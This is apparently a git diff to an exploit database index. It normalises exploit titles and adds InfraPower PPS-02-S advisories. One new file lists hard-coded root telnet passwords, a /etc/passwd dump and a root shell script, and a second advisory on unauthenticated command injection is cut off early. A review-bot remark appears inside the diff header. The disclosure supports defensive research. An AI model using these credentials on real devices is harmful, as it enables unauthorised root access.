diff --git a/files.csv b/files.csv
index 36fa74c4d..e6be23fc0 100755
--- a/files.csv
+++ b/files.csv
@@ -4610,53 +4610,53 @@ id,file,description,date,author,platform,type,port
 4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Buffer Overflow",2008-01-22,Elazar,windows,remote,0
 4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' Parameter SQL Injection",2008-01-22,S@BUN,php,webapps,0
 4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
-4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
+4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
 4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
-4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
-4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
+4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
+4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
 4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
 4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow",2008-01-22,Elazar,windows,remote,0
-4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
+4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - 'story' Parameter SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
 4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
-4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
+4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
 4971,platforms/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0
-4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
-4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
-4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution",2008-01-23,h07,windows,remote,0
-4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - (newlang) Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
-4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - (update) Local File Inclusion",2008-01-23,Stack,php,webapps,0
+4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
+4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
+4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution",2008-01-23,h07,windows,remote,0
+4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
+4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion",2008-01-23,Stack,php,webapps,0
 4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0
 4978,platforms/hardware/dos/4978.html,"Apple iOS 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,hardware,dos,0
 4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control - Buffer Overflow",2008-01-24,Elazar,windows,remote,0
-4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
-4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
+4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'files' Parameter Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
+4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
 4982,platforms/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
 4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0
-4985,platforms/php/webapps/4985.txt,"flinx 1.3 - (category.php id) SQL Injection",2008-01-25,Houssamix,php,webapps,0
+4985,platforms/php/webapps/4985.txt,"flinx 1.3 - 'id' Parameter SQL Injection",2008-01-25,Houssamix,php,webapps,0
 4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method Exploit",2008-01-25,plan-s,windows,remote,0
-4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - AddFile() Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
+4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
 4988,platforms/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0
-4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0
+4989,platforms/php/webapps/4989.txt,"Simple Forum 3.2 - File Disclosure / Cross-Site Scripting",2008-01-26,tomplixsee,php,webapps,0
 4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",php,webapps,0
 4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion",2008-01-26,Stack,php,webapps,0
-4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
-4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
-4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
-4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
+4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
+4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
+4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
+4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0
 4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0
 4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0
 4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0
-5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
-5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - dispatcher.php Remote File Disclosure",2008-01-28,Stack,php,webapps,0
-5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - pollid SQL Injection",2008-01-29,D4m14n,php,webapps,0
-5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
-5004,platforms/windows/local/5004.c,"SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
+5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
+5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Parameter Remote File Disclosure",2008-01-28,Stack,php,webapps,0
+5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - 'pollid' Parameter SQL Injection",2008-01-29,D4m14n,php,webapps,0
+5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
+5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
 5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0
-5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
-5007,platforms/php/webapps/5007.txt,"Mambo Component NewsLetter - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
-5008,platforms/php/webapps/5008.txt,"Mambo Component Fq - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
-5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
+5007,platforms/php/webapps/5007.txt,"Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5008,platforms/php/webapps/5008.txt,"Mambo 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5009,platforms/php/webapps/5009.txt,"Mambo 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
 5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0
 5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0
 5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0
@@ -26419,16 +26419,16 @@ id,file,description,date,author,platform,type,port
 29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
 29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
 29342,platforms/php/webapps/29342.txt,"Luckybot 3 - DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0
-29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
 29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 - archive.php SQL Injection",2007-01-02,"Javor Ninov",php,webapps,0
 29376,platforms/php/webapps/29376.txt,"VCard Pro - gbrowse.php Cross-Site Scripting",2007-01-02,exexp,php,webapps,0
 29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0
@@ -29720,7 +29720,7 @@ id,file,description,date,author,platform,type,port
 32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosure",2009-04-19,r0t,cgi,webapps,0
 32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0
 32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0
-32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'ask/search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
+32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
 32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,asp,webapps,0
 32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0
 32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0
@@ -36728,6 +36728,13 @@ id,file,description,date,author,platform,type,port
 40631,platforms/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps,0
 40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0
 40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0
+40642,platforms/php/webapps/40642.txt,"InfraPower PPS-02-S Q213V1 - Local File Disclosure",2016-10-28,LiquidWorm,php,webapps,0
+40644,platforms/php/webapps/40644.txt,"InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference",2016-10-28,LiquidWorm,php,webapps,0
+40645,platforms/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps,0
+40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple XSS",2016-10-28,LiquidWorm,php,webapps,0
+40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0
+40643,platforms/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,hardware,remote,0
+40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0
 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
 40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial Of Service",2016-10-27,"Peter Baris",windows,dos,0
 40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0
diff --git a/platforms/hardware/remote/40643.txt b/platforms/hardware/remote/40643.txt
new file mode 100755
index 000000000..b51140711
--- /dev/null
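Review bot: The new 40641 row abbreviates the vulnerability class as `Multiple XSS`, while every other row in this index — including the titles the first three hunks of this same commit are normalizing — spells it out as `Cross-Site Scripting`; `40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting Vulnerabilities",2016-10-28,LiquidWorm,php,webapps,0` would match the file's own convention. The seven rows are also inserted between 40633 and 40634 and in a non-ascending order (40642, 40644, 40645, 40641, 40646, 40643, 40640), whereas the surrounding rows of this hunk are in ascending id order; placing them after 40636 would keep that. Four of the indexed files (40642, 40644, 40645, 40646) have no file section in the part of the diff visible here, so the index may reference files this commit does not add — worth confirming against the rest of the diff.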
+++ b/platforms/hardware/remote/40643.txt 
@@ -0,0 +1,195 @@ +InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access + + +Vendor: Austin Hughes Electronics Ltd. +Product web page: http://www.austin-hughes.com +Affected version: Q213V1 (Firmware: V2395S) +Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) + +Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each +IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. +Patented IP Dongle provides IP remote access to the PDUs by a true +network IP address chain. Only 1xIP dongle allows access to max. 16 +PDUs in daisy chain - which is a highly efficient cient application +for saving not only the IP remote accessories cost, but also the true +IP addresses required on the PDU management. + +Desc: InfraPower suffers from a use of hard-coded credentials. The IP +dongle firmware ships with hard-coded accounts that can be used to gain +full system access (root) using the telnet daemon on port 23. + +Tested on: Linux 2.6.28 (armv5tel) + lighttpd/1.4.30-devel-1321 + PHP/5.3.9 + SQLite/3.7.10 + + +Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5371 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php + + +27.09.2016 + +-- + + +# cat /etc/passwd + +root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh +bin:x:1:1:bin:/bin:/bin/sh +daemon:x:2:2:daemon:/usr/sbin:/bin/sh +adm:x:3:4:adm:/adm:/bin/sh +lp:x:4:7:lp:/var/spool/lpd:/bin/sh +sync:x:5:0:sync:/bin:/bin/sync +shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh +operator:x:11:0:Operator:/var:/bin/sh +nobody:x:99:99:nobody:/home:/bin/sh +admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script +user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script +service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh +www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh 
+www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh + +# showing accounts in root group: + +Username: root +Password: 8475 +-- +Username: service +Password: ipdongle +-- +Username: www +Password: 9311 +-- +Username: www2 +Password: 9311 + +# showing other less-privileged accounts: + +Username: user +Password: 8475 +-- +Username: admin +Password: 8475 + +-------- + +/mnt/mtd # echo $SHELL +/sbin/root_shell.sh +/mnt/mtd # cat /sbin/root_shell.sh +#!/bin/sh +trap "" 2 3 9 24 + +# check login +passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2` + +if [ "$passWork" = "1" ]; then + login_file=/mnt/mtd/root_login + now_timestamp=`date +%s` + + if [ -f $login_file ]; then + line=`wc -l $login_file | cut -c 1-9` + if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then + pre_login=`tail -n 3 $login_file | cut -d " " -f 1` + pre_result1=`echo $pre_login | cut -d " " -f 1` + pre_result2=`echo $pre_login | cut -d " " -f 2` + pre_result3=`echo $pre_login | cut -d " " -f 3` + if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then + pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2` + result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp` + if [ "$result" != "success" ]; then + echo $result + exit 0 + fi + fi + fi + fi + + echo -n "password:" + read pass + if [ "$pass" != "999" ]; then + echo "wrong password" + echo fail $now_timestamp >> $login_file + exit 0 + fi + echo success $now_timestamp >> $login_file +fi + +/bin/sh +/mnt/mtd # + +-------- + +/mnt/mtd # ls +IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf +PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf +PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log + +-------- + +/mnt/mtd # df -h + +Filesystem Size Used Available Use% Mounted on +tmpfs 256.0M 4.0K 256.0M 0% /tmp +/dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd 
+/dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1 +/dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2 +/dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3 + +-------- + +/www # ls -al + +drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 . +drwxr-xr-x 16 root root 0 Nov 28 11:17 .. +-rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php +-rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php +-rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php +-rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php +-rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php +-rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php +drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General +-rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php +-rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php +drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images +drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript +-rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php +-rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php +-rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php +-rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php +-rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php +-rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php +-rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php +-rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php +-rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php +-rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php +-rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php +-rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php +-rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php +-rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php +-rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php +-rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php +-rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php +-rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php +-rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php +-rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php +-rwxr--r-- 1 1013 1014 5984 Apr 22 
2014 SensorStatus_Ajax.php +-rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php +-rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php +-rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php +-rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php +-rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php +-rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php +-rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php +-rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php +-rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh +-rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php +-rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php +-rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php + diff --git a/platforms/hardware/webapps/40640.txt b/platforms/hardware/webapps/40640.txt new file mode 100755 index 000000000..fdd37727d --- /dev/null +++ b/platforms/hardware/webapps/40640.txt 
@@ -0,0 +1,348 @@ +InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution + + +Vendor: Austin Hughes Electronics Ltd. +Product web page: http://www.austin-hughes.com +Affected version: Q213V1 (Firmware: V2395S) +Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) + +Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each +IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. +Patented IP Dongle provides IP remote access to the PDUs by a true +network IP address chain. Only 1xIP dongle allows access to max. 16 +PDUs in daisy chain - which is a highly efficient cient application +for saving not only the IP remote accessories cost, but also the true +IP addresses required on the PDU management. + +Desc: InfraPower suffers from multiple unauthenticated remote command +injection vulnerabilities. The vulnerability exist due to several POST +parameters in several scripts not being sanitized when using the exec(), +proc_open(), popen() and shell_exec() PHP function while updating the +settings on the affected device. This allows the attacker to execute 